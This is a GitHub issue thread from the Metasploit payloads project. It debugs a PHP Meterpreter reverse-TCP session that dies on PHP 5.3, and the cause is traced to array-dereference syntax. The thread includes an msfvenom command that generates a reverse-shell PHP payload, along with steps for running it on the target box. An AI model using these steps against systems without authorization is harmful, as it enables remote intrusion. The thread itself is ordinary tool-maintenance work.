### ISSUE TITLE
PHP Meterpreter session dies as soon as it's connected

### ISSUE THREAD

**Issue by wchen-r7** [rapid7/metasploit-payloads#95]
## Problem

php/meterpreter/reverse_tcp session dies as soon as it is connected, like the following screenshot:

<img width="942" alt="screen shot 2016-04-06 at 11 11 07 am" src="https://cloud.githubusercontent.com/assets/1170914/14323951/74f17efe-fbe8-11e5-84be-b587d09b6630.png">

## framework.log

LogLevel is at 3, but framework.log has nothing much to show:

```
[04/06/2016 11:10:06] [w(0)] core: Session 3 has died
[04/06/2016 11:10:35] [d(0)] core: Session 3 did not respond to validation request Rex::TimeoutError: Operation timed out
```

## Setup

The victim machine:

* Ubuntu 11.10
* PHP 5.3.6-13

Here's how I generated the payload and executed it:

1. ```./msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw -o /tmp/test.php```
2. scp test.php to the Ubuntu box
3. ```php test.php``` (executed as root when I tested it)

**Comment by wchen-r7** [comment]
I don't actually have this problem on a different/newer Ubuntu box:

* 14.04.3
* PHP 5.5.9-1

**Comment by egypt** [comment]
@wchen-r7 Is there anything in the PHP logs?

**Comment by wchen-r7** [comment]
I don't recall seeing any. But I still have this box and I can double check.

**Comment by wchen-r7** [comment]
@egypt @bcook-r7  Actually, there is (with error_reporting(E_ALL)):

```
$ php ./test.php 
/*PHP Parse error:  syntax error, unexpected '[' in /home/sinn3r/Desktop/test.php(1) : eval()'d code on line 1266
```

Line 1266 in the code it's trying to eval() seems to be this line:

```
$len = unpack("Nlen", xor_bytes($xor, substr($request, 0, 4)))['len'];
```

**Comment by wchen-r7** [comment]
I have a testcase that you can test:

```php
<?php

function xor_bytes($key, $data) {
    $result = '';
    for ($i = 0; $i < strlen($data); ++$i) {
        $result .= $data{$i} ^ $key{$i % 4};
    }
    return $result;
}

$xor = "aaaa";
$request = "AAAAAAAA";
$len = unpack("Nlen", xor_bytes($xor, substr($request, 0, 4)))['len'];

?>
```

On PHP 5.3.6-13, you will get: ```PHP Parse error:  syntax error, unexpected '[' in /home/sinn3r/Desktop/blah.php on line 13```.

On PHP 5.5.9-1, there is no error.
